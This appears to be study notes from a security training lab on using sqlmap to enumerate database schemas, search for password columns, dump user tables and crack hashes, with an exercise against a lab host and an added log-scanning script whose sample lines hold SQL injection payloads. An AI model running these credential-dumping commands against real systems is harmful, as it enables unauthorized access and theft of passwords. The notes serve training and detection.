# DB Schema Enum
- To retrieve the structure of all tables and get a complete overview of the database architecture, use the `--schema` switch
```bash
sqlmap -u "http://www.example.com/?id=1" --schema
```
# Searching for Data
- When dealing with complex database structures with numerous tables and columns, we can search for databases, tables, and columns of interest by using the `--search` option
```bash
# search for table names containing the keyword "user"
sqlmap -u "http://www.example.com/?id=1" --search -T user
# search for column names containing the keyword "pass"
sqlmap -u "http://www.example.com/?id=1" --search -C pass
```
# Password Enumeration and Cracking
- Once we identify a table containing passwords (e.g. `master.users`), we can retrieve that table with the `-T` option
- SQLMap has automatic password hash cracking capabilities
- Upon retrieving any value that resembles a known hash format, SQLMap prompts us to perform a dictionary-based attack on the found hashes
- Currently, there is implemented support for cracking 31 different types of hash algorithms, with an included dictionary containing 1.4 million entries (compiled over the years from the most common entries appearing in publicly available password leaks)
```bash
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users
```
- Apart from user credentials found in DB tables, we can also attempt to dump the content of system tables containing database-specific credentials (e.g., connection credentials)
- To ease the whole process, SQLMap has a special switch `--passwords` designed especially for such a task
```bash
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
# the --all switch combined with --batch automatically runs the whole enumeration process against the target and reports the enumerated details
```
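The switches above leave recognisable traces on the server side. As an added defender-side example (not part of the original notes, and not sqlmap's own code), the script below scans constructed combined-format access log lines for sqlmap's default User-Agent and for injected queries that read `information_schema` (what `--schema`/`--search` query on MySQL) or `mysql.user` (what `--passwords` reads). Because sqlmap can randomise its User-Agent with `--random-agent`, the query-content signatures matter more than the UA one; the IPs, timestamps and version string are fictional.

```python
"""Flag sqlmap-style schema and credential enumeration in a web access log.

Added example, not from the original notes. SAMPLE_LOG is constructed
(combined log format, fictional IPs and sqlmap version string).
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [09/Dec/2025:18:22:29 +0000] "GET /case1.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Dec/2025:18:22:31 +0000] "GET /case1.php?id=1%20UNION%20ALL%20SELECT%20table_name%2Ccolumn_name%20FROM%20information_schema.columns%20WHERE%20column_name%20LIKE%20%27%25pass%25%27-- HTTP/1.1" 200 1024 "-" "sqlmap/1.8.2#stable (https://sqlmap.org)"
10.0.0.7 - - [09/Dec/2025:18:22:32 +0000] "GET /case1.php?id=1%20UNION%20SELECT%20user%2Cpassword%20FROM%20mysql.user-- HTTP/1.1" 200 980 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Dec/2025:18:22:40 +0000] "GET /case1.php?id=2 HTTP/1.1" 200 500 "-" "curl/8.0"
"""

# One combined-log-format line: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Name -> (field to inspect, pattern). The path is percent-decoded before matching,
# so encoded spaces and quotes cannot hide the injected query.
SIGNATURES = {
    "sqlmap_user_agent": ("ua", re.compile(r"^sqlmap/", re.I)),
    "information_schema": ("path", re.compile(r"information_schema\.", re.I)),
    "mysql_user_table": ("path", re.compile(r"\bmysql\.user\b", re.I)),
    "union_select": ("path", re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)),
}


def classify_line(line):
    """Return the signature names matched by one log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    fields = {"ua": m.group("ua"), "path": unquote_plus(m.group("path"))}
    return [name for name, (field, pat) in SIGNATURES.items() if pat.search(fields[field])]


def scan_log(text):
    """Map each source IP to the set of signatures seen across all of its requests."""
    findings = {}
    for line in text.splitlines():
        hits = classify_line(line)
        if hits:
            ip = LOG_RE.match(line).group("ip")
            findings.setdefault(ip, set()).update(hits)
    return findings
```

Running `scan_log(SAMPLE_LOG)` attributes every signature to 10.0.0.7 only, including the third request whose browser-like User-Agent would have slipped past a UA-only rule.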
# Exercise
# Case 1
- Find the name of the column containing "style" in its name
```bash
sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --search -C style
```
![[images/Pasted image 20251209182229.png]]
- Find Kimberley's password
- Enum the schema
- Found testdb.users with "password" column
```bash
sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --schema
```
![[images/Pasted image 20251209182620.png]]
- Perform similar enum with `--search -C pass`
```bash
sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --search -C password
```
![[images/Pasted image 20251209182734.png]]
- Dump testdb.users
- Enable auto cracking when prompted
```bash
sqlmap -u "http://94.237.121.111:33358/case1.php?id=1" --dump -T users -D testdb
```
![[images/Pasted image 20251209183037.png]]